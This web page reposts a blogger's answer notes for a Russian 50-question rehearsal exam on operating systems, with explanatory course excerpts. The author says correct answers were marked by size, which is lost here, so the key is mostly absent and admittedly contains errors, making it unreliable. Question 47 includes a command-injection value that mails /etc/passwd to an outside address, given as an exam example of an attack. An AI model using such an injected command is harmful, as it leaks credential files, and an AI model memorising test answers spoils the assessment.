Аттестационное тестирование в сфере профессионального образования




https://mva-tests.blogspot.com/

(весь юмор в том, что чиновники из Минобра пытаются проверить через тесты спецдисциплину, в которой они "ни уха-ни рыла...", а потому берется какой-нибудь ублюдочный курс и из него выдергиваются вопросы и ответы, все хорошо, если читать именно этот курс, в остальном - вероятность попадания 20-30%; я пошустрил по И-нету, нашел, как мне кажется, прообраз - курс "Операционные системы, среды и оболочки" какого-то южного (то ли ставропольского, то ли черкасского:-) педагогического унивеситета (!!!), и на основании их мудрствований подготовил ответы, добавив в "мутных" случаях комментарии из этого курса, Wiki и Googl-а)

Это - ответы на репетиционный тест, надеюсь, что основной не намного умнее. В вопросы добавлены названия разделов, приведены все ответы, правильные выделены размером. По моему убеждению, чтобы пройти тестирование, нормальному студенту достаточно накануне прочитать два-три раза эту белиберду, память у вас еще прекрасная, что-то в ней останется и этого будет достаточно для 40-50%-ного результата. (В конце есть ряд вопросов по компьютерной безопасности, тема эта в курсе ОС не рассматривается, да и то, что там представлено, - борьба с вирусами в изложении для слабоумных, компьютерная безопасность - серьезная вещь, и не нам, сирым и убогим, в ней разбираться:-).

Успехов вам, М.А.

Приношу свои извинения возможным читателям, в нижеприведенных ответах обнаружены ошибки, которые постараюсь сейчас исправить.М.А. 30.08.12 - 19.00 (к сожалению, одну ошибку все-таки так и не смог найти:-(, простите).

Специальность: 230101.65 – Вычислительные машины, комплексы, системы и сети Дисциплина: Операционные системы
Время выполнения теста: 90 минут Количество заданий: 50

ЗАДАНИЕ N 1 Назначение и функции операционных систем Для сетевых операционных систем характерной является функция обеспечения …
1) прямого доступа к оперативной памяти другого компьютера   2) взаимодействия связанных между собой компьютеров
3) обмена сигналами между выполняющимися на разных компьютерах программами   4) программных каналов между разными компьютерами

 

 
ЗАДАНИЕ N 2 Операционная среда Одна операционная система может поддерживать несколько …
1) микропрограммных сред   2) операционных систем
3) микропрограммных систем   4) операционных сред

 

Операционная система выполняет функции управления вычислительными процессами в вычислительной системе, распределяет ресурсы вычислительной системы между различными вычислительными процессами и образует программную среду, в которой выполняются прикладные программы пользователя. Такая среда называется операционной. Параллельное существование терминов “операционная система” и “операционная среда” вызвано тем, что операционная система может поддержать несколько операционных сред.  

 

ЗАДАНИЕ N 3 Прерывания Термин "маскирование" означает запрет отдельных …
1) сигналов прерывания   2) команд пользователя
3) процессов пользователя   4) команд процессора

 

 
ЗАДАНИЕ N 4 Процессы и потоки Для реализации синхронизации на уровне языка программирования используются высокоуровневые примитивы, названные …
1) супервизорами   2) мониторами
3) маркерами   4) семафорами

Монитор (по Ч. Хоару) – высокоуровневая конструкция для синхронизации: многовходовый модуль, содержащий описание общих данных и операций над ними в виде процедур. Обеспечивается взаимное исключение исполнения мониторных операций. Монитор может также содержать условные переменные, для которых определены операции wait и signal для организации дополнительных очередей процессов. Рассмотрено решение задачи "обедающие философы" с использованием монитора. Описана реализация монитора и условных переменных с помощью семафоров.

 

 

ЗАДАНИЕ N 5 Файлы и файловые системы Относительный путь к файлу состоит из списка каталогов, которые нужно …
1) пройти от рабочего каталога, чтобы добраться до файла   2) открыть в корневом процессе, чтобы добраться до файла
3) добавить в переменную PATH операционной среды   4) пройти от корневого каталога, чтобы добраться до файла

 

 
ЗАДАНИЕ N 6 Память Свопингом сегментов называется перемещение …
1) блоков файла между каталогами файловой системы   2) блоков данных между процессом и ядром операционной системы
3) сегментов данных между стеком и оперативной памятью   4) сегментов между оперативной и внешней памятью

 

 

 

ЗАДАНИЕ N 7 Пользователи Идентификатор пользователя представляет собой уникальное _______ значение
1) составное   2) символьное
3) вещественное   4) целое

 

 
ЗАДАНИЕ N 8 Режимы работы Мультитерминальный режим работы предполагает совмещение …
1) привилегированного режима работы и режима пользователя   2) многопроцессорного режима работы и режима ввода-вывода
3) диалогового режима работы и режима мультипрограммирования   4) аналогового режима работы и режима микропрограммирования

 

 

 

ЗАДАНИЕ N 9 Концепция процесса Последовательная трансляция двух исходных программ является …
1) одним последовательным процессом   2) двумя одинаковыми процессами
3) двумя разными процессами   4) одной последовательной задачей

 

 
ЗАДАНИЕ N 10 Идентификатор, дескриптор и контекст процесса Идентификатор процесса является частью _____________ процесса.
1) контекста   2) Типа
3) дескриптора!!!   4) Описателя

 

 

 

ЗАДАНИЕ N 11 Иерархия процессов В OS UNIX каждый новый процесс может быть образован (порожден) только …
1) двумя из существующих процессов   2) несколькими родительскими процессами
3) четным количеством родительских процессов   4) одним из существующих процессов

 

 
ЗАДАНИЕ N 12 Диспетчеризация процессов (- выберите один вариант ответа) Основное различие между долгосрочным и краткосрочным планированием (диспетчеризацией) заключается в …
1) длительности выполнения   2) очередности выполнения
3) скорости выполнения   4) частоте выполнения

 

Планирование заданий используется в качестве долгосрочного планирования процессов. Оно отвечает за порождение новых процессов в системе, определяя ее степень мультипрограммирования, т. е. количество процессов, одновременно находящихся в ней. Если степень мультипрограммирования системы поддерживается постоянной, т. е. среднее количество процессов в компьютере не меняется, то новые процессы могут появляться только после завершения ранее загруженных. Поэтому долгосрочное планирование осуществляется достаточно редко.  

 

ЗАДАНИЕ N 13 Понятия приоритета и очереди процессов Приоритет, меняющейся во время исполнения процесса, называется _______ приоритетом.
1) фиксированным   2) Циклическим
3) статическим   4) Динамическим

 

 
ЗАДАНИЕ N 14 Синхронизация процессов При совместном использовании процессами аппаратных и информационных ресурсов вычислительной системы возникает потребность в …
1) адаптации   2) Синхронизации
3) оптимизации   4) Буферизации

 

 

 

ЗАДАНИЕ N 15 Средства обработки сигналов В операционной системе UNIX сигналы можно рассматривать как простейшую форму взаимодействия между …
 
1) процессами   2) процессорами
3) сегментами   4) каналами

 

 
ЗАДАНИЕ N 16 Понятие событийного программирования????? (- выберите несколько вариантов ответа) Область эффективного применения событийного программирования начинается там, где возникают …
1) трудности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы   2) возможности декомпозиции решаемой задачи, при которой генерация и обработка рассматриваются как объединенные процессы
3) необходимость использования графа перехода между состояниями   4) неудобство использования графа переходов между состояниями

 

 

 

ЗАДАНИЕ N 17 Средства коммуникации процессов Два параллельных процесса могут быть …
1) Взаимоисключающими   2) независимыми
3) Критическими   4) коммутационными

 

 
ЗАДАНИЕ N 18 Способы реализации мультипрограммирования Главной целью мультипрограммирования в системах пакетной обработки является …
1) обеспечение удобства работы пользователей   2) минимизация простоев всех устройств компьютера
3) минимизация времени выполнения одной задачи   4) обеспечение реактивности системы

 

 

 

ЗАДАНИЕ N 19 Организация памяти. Адресное пространство Учет участков свободной памяти с помощью связного списка свободных/занятых блоков позволяет …
1) находить в памяти наиболее долго занятые участки   2) выделять участки памяти произвольных размеров
3) освобождать память, занятую неактивными процессами   4) перемещать процессы в памяти

 

 
ЗАДАНИЕ N 20 Методы управления памятью Использование виртуальной памяти в однопрограммном режиме приводит к … процесса, если размер программы существенно больше объема доступной оперативной памяти
1) аварийному завершению   2) Ускорению
3) замедлению выполнения   4) перезапуску

 

 

 

ЗАДАНИЕ N 21 Принципы организации виртуальной памяти Виртуальная память позволяет …
1) отказаться от предоставления прикладным процессам оперативной памяти   2) загружать множество небольших программ, суммарный объем которых больше объема физической памяти
3) загружать программы, размер которых превышает объем доступной физической памяти   4) загружать программы, скомпилированные для другого процессора

 

 
ЗАДАНИЕ N 22 Сегментная организация памяти Сегментная организация памяти … отдельно скомпилированных процедур.
1) состоит из   2) упрощает компоновку
3) невозможна без   4) усложняет компоновку

 

Помимо простоты управления увеличивающимися или сокращающимися структурами данных, сегментированная память обладает и другими преимуществами. К ним относятся: простота компоновки отдельно скомпилированных процедур (обращение к начальной точке процедуры осуществляется адресом вида (n,0), где n – номер сегмента);  

 

ЗАДАНИЕ N 23 Страничная организация памяти При страничной организации памяти таблица страниц может размещаться в …
1) только в оперативной памяти   2) в оперативной памяти и на диске
3) только в процессоре   4) В специальной быстрой памяти процессора и в оперативной памяти

 

 
ЗАДАНИЕ N 24 Ускорение работы страничной памяти Страничная организация предназначена для …
1) облегчения совместного использования процедур, библиотек и массивов данных   2) повышения уровня защиты программ и данных
3) получения большого адресного пространства без приобретения дополнительной физической памяти   4) логического разделения программ и данных

 

 
ЗАДАНИЕ N 25 Принципы замещения страниц При страничном сбое и отсутствии свободных блоков физической памяти операционная система должна …
1) выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске   2) выбрать страницу-кандидат на удаление из памяти и сохранить удаляемую страницу на диске, если она претерпела изменения
3) выбрать страницу, которая не изменялась, и сохранить удаляемую страницу на диске   4) выбрать страницу-кандидат на удаление из памяти и сохранить копию удаляемой страницы в таблице страниц

 

 
ЗАДАНИЕ N 26 Алгоритмы замещения страниц Полная реализация алгоритма LRU (Least Recently Used) …
1) теоретически невозможна   2) возможна при использовании стековой организации таблицы страниц
3) возможна при условии построения таблицы страниц в виде бинарных деревьев   4) практически невозможна

 

LRU - хороший, но труднореализуемый алгоритм. Необходимо иметь связанный список всех страниц в памяти, в начале которого будут хранится недавно использованные страницы. Причем этот список должен обновляться при каждом обращении к памяти. Много времени нужно и на поиск страниц в таком списке.  

 

ЗАДАНИЕ N 27 Прерывания от внешних устройств Запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы получает _____________ ввода-вывода.
1) контроллер   2) диспетчер
3) супервизор   4) процессор

 

супервизор ввода-вывода получает запросы на ввод-вывод от супервизора задач или от программных модулей самой операционной системы  
ЗАДАНИЕ N 28 Классификация устройств ввода-вывода Мыши (в качестве устройства-указателя) относятся к _____________ устройствам ввода-вывода.
1) позиционируемым   2) символьным
3) адресуемым   4) Блочным

 

Другой тип устройств ввода-вывода — символьные устройства. Они выдают или воспринимают поток символов, не относящийся ни к какой блочной структуре. Они не являются адресуемыми и не имеют никакой операции позиционирования. В качестве символьных устройств могут рассматриваться принтеры, сетевые интерфейсы, мыши (в качестве устройства-указателя)  

 

ЗАДАНИЕ N 29 Основные принципы организации ввода-вывода Любые операции по управлению вводом-выводом объявляются …
1) привилегированными   2) Универсальными
3) приоритетными   4) Уникальными

 

 
ЗАДАНИЕ N 30 Функции супервизора ввода-вывода Супервизор ввода-вывода инициирует операции ввода-вывода и в случае управления вводом-выводом с использованием прерываний предоставляет процессор …
1) супервизору прерываний   2) диспетчеру задач
3) задаче пользователя   4) супервизору программ

 

 

 

ЗАДАНИЕ N 31 Режимы управления вводом-выводом В режиме обмена с опросом готовности устройства ввода-вывода используется _____________ центрального процессора.
1) рационально время   2) нерационально память
3) нерационально время   4) рационально память

 

 
ЗАДАНИЕ N 32 Закрепление устройств, общие устройства ввода-вывода Понятия «виртуального устройства» по отношению к понятию «спулинга» …
1) соотносится как часть и целое???   2) является более широким!!
3) является более узким   4) Тождественно

 

 

 

ЗАДАНИЕ N 33 Основные системные таблицы ввода-вывода Каждый элемент таблицы оборудования условно называется …
1) UCB!!!   2) USB
3) DCB   4) DRT

 

Каждая ОС имеет свои таблицы ввода/вывода, их состав (количество и назначе­ние каждой таблицы) может сильно отличаться. Первая таблица содержит информацию обо всех устройствах вво­да/вывода, подключенных к вычислительной системе,- таб­лица оборудования (equipment table), а каждый элемент этой таблицы на­зывается UCB (unit control block, блок управления устройством ввода/вывода). Вторая таблица предназначена для реализации принципа виртуа­лизации устройств ввода/вывода – независимости от устройства. Действительное устройство, которое сопоставляется виртуальному (логическому), выбирается супервизором с помощью таблицы описания виртуальных логических устройств (DRT, device reference table). Назначение этой второй таблицы – установление связи между виртуальными (логическими) устройствами и реальными устройст­вами, описанными посредством первой таблицы оборудования.  
ЗАДАНИЕ N 34 Синхронный и асинхронный ввод-вывод Для увеличения скорости выполнения приложений при необходимости предлагается использовать _____________ ввод-вывод.
1) асинхронный   2) приоритетный
3) автоматический   4) синхронный

 

 

 

ЗАДАНИЕ N 35 Организация внешней памяти на магнитных дисках Программа, расположенная в главной загрузочной записи, называется _____________ загрузчиком.
1) системным   2) Внесистемным
3) начальным   4) Локальным

 

На жестком диске по физическому адресу 0-0-1 располагается главная загрузочная запись (master boot record, MBR). В состав MBR входят: - внесистемный загрузчик (non-system bootstrap - NSB); - таблица описания разделов диска (таблица разделов, partition table, PT).  
ЗАДАНИЕ N 36 Кэширование операций ввода-вывода при работе с накопителями на магнитных дисках Простейшим вариантом ускорения дисковых операций чтения данных можно считать использование двойной …
1) Кластеризации   2) буферизации
3) Диспетчеризации   4) приоритезации

 

 

 

ЗАДАНИЕ N 37 Принципы построенияОС Операционная система реального времени должна обеспечивать …
1) делегирование полномочий   2) наследование приоритетов
3) пакетную обработку   4) клонирование пользователей

 

Требования, предъявляемые к среде исполнения систем реального времени, следующие: - ядро с приоритетом на обслуживание прерывания. Приоритет на прерывание означает, что готовый к запуску процесс, обладающий некоторым приоритетом, обязательно имеет преимущество в очереди по отношению к процессу с более низким приоритетом, быстро заменяет последний и поступает на выполнение. Ядро заканчивает любую сервисную работу, как только поступает задача с высшим приоритетом. - диспетчер с приоритетом - дает возможность разработчику прикладной программы присвоить каждому загрузочному модулю приоритет, неподвластный системе. Присвоение приоритетов используется для определения очередности запуска программ, готовых к исполнению. Диспетчеризация, в основу которой положен принцип присвоения приоритета, и наличие ядра с приоритетом на прерывание позволяют. Если наступает событие с высшим приоритетом, система прекращает обработку задачи с низшим приоритетом и отвечает на вновь поступивший запрос. Мартин Тиммерман сформулировал следующие необходимые требования для ОСРВ
  • ОС должна быть многозадачной и допускающей вытеснение (preemptable),
  • ОС должна обладать понятием приоритета для потоков,
  • ОС должна поддерживать предсказуемые механизмы синхронизации,
  • ОС должна обеспечивать механизм наследования приоритетов,
 
ЗАДАНИЕ N 38 Ядро и ресурсы К невыгружаемым относятся такие ресурсы, которые не могут быть …
1) загружены в память   2) выгружены из памяти
3) отобраны у процесса   4) отобраны у процессора

 

Выгружаемый ресурс - этот ресурс безболезненно можно забрать у процесса (например: память). Невыгружаемый ресурс - этот ресурс нельзя забрать у процесса без потери данных (например: принтер).  

 

ЗАДАНИЕ N 39 Интерфейсы операционных систем Интерфейс прикладного программирования предназначен для использования прикладными программами …
1) системных ресурсов компьютера   2) регистров общего назначения процессора
3) интерпретатора команд пользователя   4) адресного пространства процесса

 

Практически все операционные системы имеют API, с помощью которого программисты могут создавать приложения для этой операционной системы. Главный API операционных систем — это множество системных вызовов.  
ЗАДАНИЕ N 40 Классификация операционных систем По режиму обработки задач различают операционные системы, обеспечивающие _________ режим
1) мультипрограммный   2) виртуальный
3) однопрограммный   4) многопользовательский???

 

 

 

ЗАДАНИЕ N 41 Анализ угроз и уязвимостей в операционных системах Угроза зомби реализуется с помощью … и заставляет компьютер выполнять приказания других лиц.
1) вызова утилит операционной системы   2) диспетчера приложений
3) вредоносных программ   4) подбора пароля

 

ботнет или зомби-сеть – это сеть компьютеров, зараженных вредоносной программой поведения Backdoor. Backdoor’ы позволяют киберпреступникам удаленно управлять зараженными машинами (каждой в отдельности, частью компьютеров, входящих в сеть, или всей сетью целиком) без ведома пользователя.  
ЗАДАНИЕ N 42 Основы криптографии Недостаток систем шифрования с секретным ключом состоит в том, что …
1) отправитель сообщения не может его расшифровать   2) отправитель и получатель должны иметь общий секретный ключ
3) объем вычислений при дешифровании намного больше, чем при шифровании   4) объем вычислений при шифровании намного больше, чем при дешифровании

 

Эффективность систем с секретным ключом обусловлена вполне приемлемым объемом вычислений, необходимых для шифрования или дешифрования сообщения, но у них имеется серьезный недостаток: и отправитель, и получатель должны владеть общим секретным ключом  

 

ЗАДАНИЕ N 43 Механизмы защиты Объектами защиты в компьютерных системах могут быть …
ВАРИАНТЫОТВЕТОВ:
1) устройства отображения информации   2) помещения
3) сотрудники   4) программы

 

Объект защиты — информация, носитель информации или информационный процесс, в отношении которых необходимо обеспечивать защиту в соответствии с поставленной целью защиты информации.  
ЗАДАНИЕ N 44 Надежные вычислительные системы Политика принудительного управления доступом (mandatory access control) возлагает полномочия по назначению прав доступа к файлам и другим объектам на...
ВАРИАНТЫОТВЕТОВ:
1) пользователей   2) прикладную программу
3) операционную систему   4) руководителей подразделений

 

 

 

ЗАДАНИЕ N 45 Методы аутентификации Защита зашифрованных паролей в UNIX взламывается путем …
1) шифрования множества потенциальных паролей открытым алгоритмом шифрования и поиска совпадений в файле паролей   2) привлечения инсайдеров в качестве сообщников
3) расшифровки всех паролей после копирования файла паролей   4) вычисления пароля путем свертки идентификатора пользователя

 

 
ЗАДАНИЕ N 46 Инсайдерские атаки Лазейки в программах создаются …
1) для облегчения отладки программ или в противоправных целях   2) только для противоправных целей
3) для внедрения в программу постороннего кода   4) только для облегчения отладки программ

 

Лазейки (trapdoors). Лазейка представляет собой точку вхо­да в программу, благодаря чему открывается непосредственный доступ к некоторым системным функциям. Лазейки обычно встав­ляют во время проектирования системы. Системные программисты организуют их при отладке программы, но по завершении ее разработки их надо устранить.  

 

ЗАДАНИЕ N 47 Внешние атаки Программа, выполняющая копирование файла путем системного вызова, запрашивает у пользователя имена файла-источника и файла-приемника. Злоумышленник ввел в качестве имен файлов следующие значения: “aaa” и “bbb; mail goofinator@mail.ru </etc/passwd”. Какие действия выполнит система?
1) Скопирует файл aaa в bbb отправит файл bbb адресату goofinator@mail.ru.   2) Отправит файл aaa адресату goofinator@mail.ru.
3) Скопирует текст aaa в файл паролей, относящийся к пользователю с идентификатором goofinator@mail.ru.   4) Скопирует файл aaa в bbb и отправит по электронной почте файл паролей адресату goofinator@mail.ru.

 

 
ЗАДАНИЕ N 48 Вредоносные программы Наиболее популярное применение ботнетов (сети зараженных компьютеров) - это …
1) организация сетевых азартных игр   2) распространение пиратского контента
3) рассылка коммерческого спама   4) хищение денег с кредитных карт

 

 

 

ЗАДАНИЕ N 49 Троянские кони и вирусы Перезаписывающий вирус заражает исполняемую программу путем …
1) записи кода вируса в тело зараженной программы после каждого ее вызова   2) перезаписи содержимого стека программы кодом вируса
3) перезаписи служебных секторов дисков   4) записи вируса на место кода программы!!!

 

 
ЗАДАНИЕ N 50 Средства защиты от вредоносных программ Обнаружить зашифрованный вирус можно...
1) с помощью универсальной программы дешифрования   2) по характерному поведению зараженной программы при запуске
3) по сигнатурам кода процедур расшифровки вируса!!!   4) по изменению размера программы

 

Это вирусы-партизаны, которые попав в систему, сразу не дают себя обнаружить и не вступают в активную фазу. Они выжидают нужное им время, находясь в закодированном и безвредном состоянии, при этом зачастую они остаются незамеченными сканерами антивирусов. Как только наступает благоприятное для заражения файлов время, вирусы дешифруются, выполняют свою «грязную работу» и снова кодируются. Различные методы шифрования и упаковки вредоносных программ делают даже известные вирусы не обнаруживаемыми антивирусным программным обеспечением. Для обнаружения этих «замаскированных» вирусов требуется мощный механизм распаковки, который может дешифровать файлы перед их проверкой

 

 



Поделиться:




Поиск по сайту

©2015-2024 poisk-ru.ru
Все права принадлежать их авторам. Данный сайт не претендует на авторства, а предоставляет бесплатное использование.
Дата создания страницы: 2016-08-20 Нарушение авторских прав и Нарушение персональных данных


Поиск по сайту: